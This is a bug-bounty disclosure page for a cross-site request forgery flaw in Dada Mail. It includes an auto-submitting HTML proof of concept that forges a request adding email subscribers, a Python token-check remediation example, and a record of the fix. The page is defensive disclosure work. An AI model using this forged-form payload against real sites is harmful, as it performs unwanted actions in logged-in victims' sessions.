Cross-Site Request Forgery (CSRF) in justingit/dada-mail


Reported on

Sep 12th 2021

✍️ Description

An attacker is able to add any number of subscribers via a CSRF attack.

For a CSRF attack it is enough that a user is logged into your application and then visits a malicious website; with nothing more than a redirection, the attacker can perform an action against an unprotected endpoint. In other words, merely visiting a site causes an unwanted action to be performed without the user being aware of it.

Alternatively, a user with low privileges can send a link to other users or admins with higher privileges, and the malicious request will then be executed without the victim users or admins being aware of it.

🕵️‍♂️ Proof of Concept

1. First, an admin or a user with the necessary privileges must already be logged in in some browser.

2. Open PoC.html (it auto-submits).

3. A subscriber with the given email address will be added once PoC.html has been opened.

// PoC.html

  <script>history.pushState('', '', '/')</script>
  <!-- action is left empty as in the original report; it would point at the Dada Mail endpoint that handles these form fields -->
  <form action="" method="POST">
    <input type="hidden" name="flavor" value="add&#95;email" />
    <input type="hidden" name="type" value="list" />
    <input type="hidden" name="return&#95;to" value="" />
    <input type="hidden" name="return&#95;address" value="" />
    <input type="hidden" name="not&#95;members&#95;fields&#95;options&#95;mode" value="preserve&#95;if&#95;defined" />
    <input type="hidden" name="address" value="&quot;test&#64;test&#46;com&quot;&#44;&quot;&quot;" />
    <!-- the trailing arrow (U+21D2) was mis-encoded as raw UTF-8 bytes in the original report -->
    <input type="hidden" name="process" value="Subscribe&#47;Update&#32;Checked&#32;Addresses&#32;&#8658;" />
    <input type="submit" value="Submit request" />
  </form>
  <!-- auto-submit: the form is posted as soon as the page loads -->
  <script>document.forms[0].submit();</script>

This PoC can perform the attack without the user noticing, and it can also send multiple requests at the same time, meaning an attacker can brute-force all possible actions (using multiple iframes).

💥 Impact

This vulnerability is capable of causing medium damage to the availability and integrity of the system.


A CSRF token should be set for each user and each form.
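As an added example (not code from the huntr report or from Dada Mail), the kind of per-session synchronizer token check that the remediation above describes, applied to the add_email request the PoC forges; the server secret, session store and handler names are assumptions:

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Constructed server secret and in-memory session store (assumptions for the demo).
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {}  # session_id -> {"user": ...}


def issue_csrf_token(session_id: str) -> str:
    """Derive a token bound to one session; a cross-site page cannot read the
    victim's logged-in page, so it cannot learn this value to put in its form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_is_valid(session_id: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison against the token expected for this session."""
    if not submitted:
        return False
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_add_email(session_id: str, form: dict) -> str:
    """Hypothetical state-changing handler for the flavor=add_email form:
    the token check runs before any subscriber is added."""
    if session_id not in SESSIONS:
        return "401 not logged in"
    if form.get("flavor") != "add_email":
        return "400 unsupported flavor"
    if not csrf_token_is_valid(session_id, form.get("csrf_token")):
        return "403 CSRF token missing or invalid"
    return "200 added " + form["address"]


def demo() -> tuple:
    """Replay the PoC's fields once without a token (forged) and once with it."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": "admin"}
    forged = {"flavor": "add_email", "type": "list", "address": "test@test.com"}
    legit = dict(forged, csrf_token=issue_csrf_token(sid))
    return handle_add_email(sid, forged), handle_add_email(sid, legit)


if __name__ == "__main__":
    print(demo())
```

Because the token is derived per session and compared in constant time, the forged request from the PoC (which carries no token) is rejected while the same fields submitted from the real form are accepted.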

We have contacted a member of the justingit/dada-mail team and are waiting to hear back 2 years ago
Justin J validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Justin J
2 years ago


All CSRF vulnerabilities are fixed in the following branch, which will be merged in master soon:

Justin J marked this as fixed with commit e9fc1c 2 years ago
Justin J has been awarded the fix bounty
This vulnerability will not receive a CVE